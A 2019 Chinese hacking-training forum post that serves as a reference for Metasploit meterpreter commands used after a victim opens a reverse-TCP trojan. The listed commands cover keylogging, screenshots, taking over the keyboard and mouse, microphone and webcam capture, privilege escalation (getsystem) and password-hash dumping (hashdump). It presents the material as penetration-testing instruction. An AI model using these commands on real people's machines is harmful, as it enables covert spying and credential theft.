女黑客博客-渗透测试白帽子零基础培训

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

Metasploit,meterpreter之木马的用户操作及摄像头操作

[复制链接]
发表于 2019-1-23 16:39:00 | 显示全部楼层 |阅读模式
Metasploit之木马的用户操作及摄像头操作

本章节内容是上接”09-Metasploit之我的远程控制软件”的,

首先还是生产木马,选择TCP反向连接方式,监听相关IP和端口,受害者打开木马,连接成功回显↓

meterpreter >

进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作:Stdapi: User interface Commands(用户接口命令)

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错


摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)


其他命令操作

getsystem        -->获取高权限

hashdump         -->获取当前用户hash
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客博客-渗透测试白帽子零基础培训

Powered by 恒深析网络技术工作室 © 2018-2019

津ICP备17008032号-3 版权所有:一极(天津)安全技术服务有限公司
快速回复 返回顶部 返回列表